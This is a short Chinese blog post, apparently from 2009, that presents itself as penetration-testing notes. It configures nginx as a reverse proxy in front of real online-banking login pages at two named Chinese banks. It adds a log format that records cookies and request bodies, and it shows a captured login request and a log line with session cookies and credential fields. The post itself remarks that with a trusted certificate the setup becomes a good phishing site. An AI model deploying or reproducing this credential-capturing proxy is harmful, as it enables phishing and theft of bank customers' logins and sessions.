做渗透测试时,会碰到https加密的网页面,无法直接使用各种工具.可以使用web服务器软件对页面进行转发,从而实现脱密.这边使用nginx进行测试.
建立一个nginx服务器,修改配置文件/etc/nginx/sites-available/default.以民生银行的个人网银行为例进行配置.
# You may add here your # server { # ... # } # statements for each of your virtual hosts
server { listen 80; server_name localhost;
access_log /var/log/nginx/localhost.access.log;
location / { index index.htm index.html; proxy_pass https://ebank.cmbc.com.cn/; }
}
|
通过配置proxy_pass ;使nginx成为一个代理服务器.重启服务后,对nginx服务器进行访问.
通过WSockExpert截取提交数据
POST /weblogic/servlets/EService/CSM/NonPrivateLogin?channelID=&PriErrPage=PriErrPage.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://192.168.52.129/weblogic/nonsecindex.jsp?channelID= Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: 192.168.52.129 Content-Length: 78 Connection: Keep-Alive Cache-Control: no-cache Cookie: JSESSIONID=KMhkvGWG51B1f3y37MXvpkqSWvc8vcShLcjnchyLQSzyQq32C5nh!1655737129!270743917; K-JSESSIONID-lgnlbcme=3334A3537EB07580F51C46CFC8ABF69C
logintype=u&txcode=c99900&account=11111111111&loginPwd=222222&CheckCode=333333
|
如果需要记录通过ngnix代理提交的内容,修改default配置文件.
# HTTPS server # server { listen 443; server_name 192.168.52.129;
ssl on; ssl_certificate ssl/cert.crt; ssl_certificate_key ssl/cert.key;
ssl_session_timeout 5m;
ssl_protocols SSLv2 SSLv3 TLSv1; ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP; ssl_prefer_server_ciphers on;
location / { # root /etc/nginx/html; # index index.html index.htm; proxy_pass https://pbsz.ebank.cmbchina.com/; }
log_format main '$remote_addr - [$time_local] $request ||||| $http_cookie ||||| $request_body'; access_log /var/log/nginx/access.log main; }
|
在日志文件中记录了$http_cookie(cookie信息)和$request_body(http内容),并使用招行个人网银为例.如果在申请一个通过认证的证书,站点将成为一个不错的钓鱼网站.
以下是截取的一个日志信息.包括了url信息,cookie信息和http提交内容:
192.168.52.1 - [05/Oct/2009:14:27:24 +0800] POST /CmbBank_GenShell/UI/GenShellPC/Login/GenLogin.aspx HTTP/1.1 ||||| CMB_GenServer=Lo ginType:A&BranchNo:0010&CreditCardType:A&IdType:01 ||||| ClientNo=015C3BBB172525FEBE9231E3448941E1515070230094203100051384&ExtraPwd= 3333&BranchNo=0010&AccountNo=ipJSoiVbS3HNMcI-3vYQsHiFp0WLlDsX9-eWKN97PbekdnzNzVg288TJCW6VdxDpufQfejoTCe-uSmgWZL67AQ__&Password=ikS2P -JmservIWpMgda8hHEzLJA04Aa6viJx0QF2zrWUDlxiLpLTbqhbVNbfqgA0c7ipLQ0zLi3fEjZJAPRdMA__&HardStamp=Aj8wMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0ND g5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NElGYmltRWVOyyIm2848AfJ9ZSdePA9n6S4j8Yf212z5y2pbjApY1HinUJmJCwGL48QLiWo8*Fmm75fzVtjTH9*fjI2qx* CEXUKkf93ltwsSq5*UvM7zkGgCaCHXQPLF396CtYjkyC82CMVIHcB89kIq*iEF7XMXCbqKloHsh5LHSCYim0wKa28GzWczV2zX9tcqGkGAPwPXuzwTF3lk7BxZstXnFx59KK jVerd8V5RNf-JAGe0aBSgt3CxxJQ__&Licex=AjgwMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0NDg5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NAAAAAAAAACqPBt4PB7 VfxBrLCVptuY12saTrYLj9xrwnsmeVMxt5O4K9LASxMNND3gZ8QOr2eQavsKgpUfsscvzXohvN7E4tbJocTwnpx6SJRsNjXImZDYP*Tq0YjH6i2ZbZu0m7gtnL01ibfqjTxM a4vplPyCLgQ__&LoginType=A
|
阅读(3309) | 评论(0) | 转发(0) |